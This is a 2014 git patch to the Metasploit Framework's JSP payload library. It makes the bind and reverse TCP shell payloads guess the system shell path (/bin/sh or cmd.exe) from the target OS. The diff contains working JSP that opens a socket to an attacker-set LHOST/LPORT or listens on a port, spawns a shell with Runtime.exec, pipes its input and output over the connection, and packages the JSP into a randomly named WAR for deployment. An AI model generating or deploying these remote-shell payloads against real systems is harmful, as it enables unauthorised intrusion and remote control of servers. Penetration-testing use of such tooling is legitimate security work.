From e1b6ee283f094e3d9b7de57ae5acaee29889ecbf Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 30 Aug 2014 16:27:02 -0500 Subject: [PATCH] Allow Msf::Payload::JSP to guess system shell path if it isnt provided --- lib/msf/core/payload/jsp.rb | 47 ++++++++++++++++++- .../singles/java/jsp_shell_bind_tcp.rb | 1 - .../singles/java/jsp_shell_reverse_tcp.rb | 1 - 3 files changed, 45 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/payload/jsp.rb b/lib/msf/core/payload/jsp.rb index 2a81902839..13dbbf2f1b 100644 --- a/lib/msf/core/payload/jsp.rb +++ b/lib/msf/core/payload/jsp.rb @@ -2,8 +2,23 @@ require 'msf/core' require 'rex' +# This module is chained within JSP payloads that target the Java platform. +# It provides methods to generate Java / JSP code. module Msf::Payload::JSP + + # @param attributes [Hash{Symbol => String,nil}] + def initialize(info = {}) + ret = super(info) + + register_options([ + Msf::OptString.new( 'SHELL', [false, 'The system shell to use.']) + ], Msf::Payload::JSP ) + + ret + end + # Outputs jsp that spawns a bind TCP shell + # # @return [String] jsp code that executes bind TCP payload def jsp_bind_tcp # Modified from: http://www.security.org.sg/code/jspreverse.html @@ -53,10 +68,11 @@ module Msf::Payload::JSP try { + #{shell_path} ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} ); Socket client_socket = server_socket.accept(); server_socket.close(); - Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" ); + Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} @@ -67,6 +83,7 @@ module Msf::Payload::JSP end # Outputs jsp code that spawns a reverse TCP shell + # # @return [String] jsp code that executes reverse TCP payload def jsp_reverse_tcp # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html @@ -116,8 +133,9 @@ module Msf::Payload::JSP try { + #{shell_path} Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} ); - Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" ); + Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} @@ -127,6 +145,7 @@ module Msf::Payload::JSP end # Wraps the jsp payload into a war + # # @return [Rex::Zip::Jar] a war to execute the jsp payload def generate_war jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp" @@ -151,4 +170,28 @@ module Msf::Payload::JSP zip end + + # Outputs Java code to assign the system shell path to a variable. + # + # It uses the datastore if a value has been provided, otherwise + # tries to guess the system shell path bad on the os target. + # + # @return [String] the Java code. + def shell_path + if datastore['SHELL'] && !datastore['SHELL'].empty? + jsp = "String ShellPath = \"#{datastore['SHELL']}\";" + else + jsp = <<-EOS +String ShellPath; +if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { + ShellPath = new String("/bin/sh"); +} else { + ShellPath = new String("cmd.exe"); +} + EOS + end + + jsp + end + end diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 087958f27d..629acf7909 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -31,7 +31,6 @@ module Metasploit3 'Payload' => '' } )) - register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class ) end diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index dc3ecfb3d9..f7ca628690 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb @@ -31,7 +31,6 @@ module Metasploit3 'Payload' => '' } )) - register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class ) end